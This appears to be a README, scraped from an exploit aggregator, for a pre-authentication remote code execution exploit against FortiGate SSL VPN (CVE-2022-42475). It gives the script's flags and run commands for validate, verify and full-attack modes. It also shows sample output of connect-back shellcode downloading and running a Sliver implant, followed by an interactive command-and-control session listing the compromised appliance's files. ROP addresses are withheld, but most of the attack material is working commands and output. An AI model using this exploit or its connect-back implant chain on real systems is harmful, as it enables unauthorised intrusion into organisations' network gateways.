## https://sploitus.com/exploit?id=77A82210-BA24-58B5-8539-C0177DA9E1FB
# CVE-2022-42475
## Background
This is the exploit for the blog post here: https://bishopfox.com/blog/exploit-cve-2022-42475
## Redacted Version
This version of the exploit will not work without you, the hacker, supplying the necessary memory addresses for ROP gadgets, etc. The work to determine these data is confidential and proprietary to Bishop Fox and I will not (cannot) publish it alongside this exploit. I trust you understand!
## Modes of operation
* Validate only, no exploit. Determines if vulnerable. No payload, no shellcode.
* __Exploit, but verify only__. Run benign connect-back "ping" shellcode to verify the target is exploitable.
* __Exploit with connect-back binary stager__. The shellcode connects back to the exploit, downloads an encrypted operator-supplied binary file (typically [https://gitub.com/BishopFox/Sliver](Sliver)), decrypts the binary, then calls `execve(binary_file)`.
**Note**: At present the "validate only" mode works across all known versions of FortiOS. However, exploits work _only_ against FortiOS 6.0.4 on 100D hardware. I no longer work at BF and therefore cannot publish the expanded exploit that supports something like 18k targets.
## Requirements
* PyCrypto
* pycryptodome
```
pip3 install PyCrypto
pip3 install pycryptodome
```
## Validate only
This will not make any attempt to exploit the bug, but instead triggers it as a crash (the remote SSL VPN daemon restarts automatically and immediately). The crash is detected heuristically and reported to the operator.
Run it using the `-v` validate flag:
```
$ ./x.py -t 192.168.0.10 -p 8443 -v
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE
```
## Exploit, but validate (feature only available for FortiOS 6.0.4 on 100D appliances at present)
This will trigger the bug, deploy a ROP chain, and jump to shellcode. The shellcode is benign and works as follows:
* Exploit connects to target and triggers the vuln to execute shellcode
* Shellcode connects back to operator's IP:port
* Shellcode sends a single "hello" byte to the exploit: `0xbf`
* Exploit delivers a small encrypted test payload to the shellcode (AES key is random each run)
* Shellcode decrypts the payload and saves it to `/tmp/x` on the FortiGate appliance
* Shellcode sends another single `0xbf` byte to the exploit if payload decryption was successful
* Exploit reads the byte and confirms code execution.
Flags:
```
-t target host/IP
-p target port
-e exploit mode
-c connect-back only mode
-H and -P operator's IP:port (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
```
An example where we select both software version `6.0.4` and the appliance model `100D`:
```
┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D 130 ⨯
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[<] Listener bound to port 443, waiting for connect-back...
[+] Validating gadgets...
[!] No functional hardware models were defined for FortiOS '5.2.14'. Removed.
[!] No functional hardware models were defined for FortiOS '5.6.9'. Removed.
[+] Imported 797 targets:
[-] 6.0.4 [ 1 targets ] <=== 100D
[-] 5.2.14 [ 47 targets ]
[-] 5.6.9 [ 60 targets ]
[-] 6.0.13 [ 68 targets ]
[-] 6.0.14 [ 67 targets ]
[-] 6.0.15 [ 58 targets ]
[-] 6.0.8 [ 67 targets ]
[-] 6.2.11 [ 69 targets ]
[-] 6.2.7 [ 75 targets ]
[-] 6.4.10 [ 71 targets ]
[-] 6.4.2 [ 62 targets ]
[-] 6.4.3 [ 61 targets ]
[-] 6.4.6 [ 73 targets ]
[-] 6.4.9 [ 72 targets ]
[-] 7.0.4 [ 53 targets ]
[+] Starting exploit
[<] Incoming request from 192.168.0.10:22470
[<] Received hello packet from target!! Model #: 100D
[<] Sending encrypted payload of 36 bytes
[<] Finished sending payload (36 bytes), waiting for response...
[<] Received the expected response ('100D') from 192.168.0.10
[<] Target is VULNERABLE with 100% confidence.
[+] All done!
```
If you omit the `-m` to choose a hardware model, the exploit will brute-force all hardware targets for the specified software version.
## Global thermonuclear warfare
* Operator specifies the location of a Sliver implant binary (Linux-based)
* Exploit connects to target and triggers the vuln to execute shellcode
* Shellcode connects back to operator's IP:port
* Shellcode sends a single "hello" byte to the exploit: `0xbf`
* Exploit encrypts Sliver binary and sends it to the shellcode
* Shellcode decrypts the binary and saves it to `/tmp/x`
* Shellcode sends a "success" `0xbf` byte to the exploit
* Exploit reads the byte and confirms code execution
* Shellcode calls `execve("/tmp/x")`
* ???
* Profit!
Flags:
```
-t target host/IP
-p target port
-e exploit mode
-f filename /path/to/binary/to/execve/on/target
-H and -P operator's IP:port for connect-back (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
```
Sliver:
```
carl@pluto:~$ ./sliver-server_linux
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain living weapon
[*] Server v1.5.34 - d2a6fa8cd6cc029818dd8d9e4a039bdea8071ca2
[*] Welcome to the sliver shell, please type 'help' for options
[server] sliver > mtls -l 8888
[*] Starting mTLS listener ...
[*] Successfully started job #1
```
Exploit:
```
$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Exploit will attempt to execve("implant5") on the target
...
[<] Target is VULNERABLE with 100% confidence.
[+] All done.
```
And back in Sliver:
```
[*] Session d8d5344b implant5 - 192.168.0.10:3500 (Burnet) - linux/amd64 - Mon, 06 Mar 2023 22:18:30 MST
[server] sliver > use d8d5344b-c666-4c60-9e33-5ce50eb82cad
[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)
[server] sliver (implant5) > whoami
Logon ID: <err>
[server] sliver (implant5) > ls
/ (19 items, 10.0 KiB)
======================
-rw-r--r-- .ash_history 590 B Tue Jan 31 11:31:57 +0000 2023
drwxr-xr-x bin <dir> Tue Jan 31 11:04:35 +0000 2023
drwxr-xr-x data <dir> Tue Jan 31 05:24:10 +0000 2023
drwxr-xr-x data2 <dir> Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x dev <dir> Tue Jan 31 05:26:16 +0000 2023
Lrwxrwxrwx etc -> data/etc 8 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx fortidev -> / 1 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx init -> /sbin/init 10 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x lib <dir> Mon Jan 07 18:03:30 +0000 2019
Lrwxrwxrwx lib64 -> lib 3 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x migadmin <dir> Tue Jan 31 05:23:26 +0000 2023
dr-xr-xr-x proc <dir> Tue Jan 31 05:23:13 +0000 2023
drwx------ root <dir> Mon Jan 07 17:17:34 +0000 2019
drwxr-xr-x sbin <dir> Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x security-rating <dir> Mon Jan 07 18:01:04 +0000 2019
drwxr-xr-x sys <dir> Tue Jan 31 05:23:27 +0000 2023
dtrwxrwxrwx tmp <dir> Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x usr <dir> Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x var <dir> Tue Jan 31 05:24:07 +0000 2023
```
Note that Sliver returns `<err>` because FortiOS is kinda mostly sorta Linux, and doesn't always work the way that you'd expect. This is an issue with FortiOS, not Sliver.
## More versions coming soon
I no longer work at Bishop Fox so you'll need to follow the BF github for updates on this.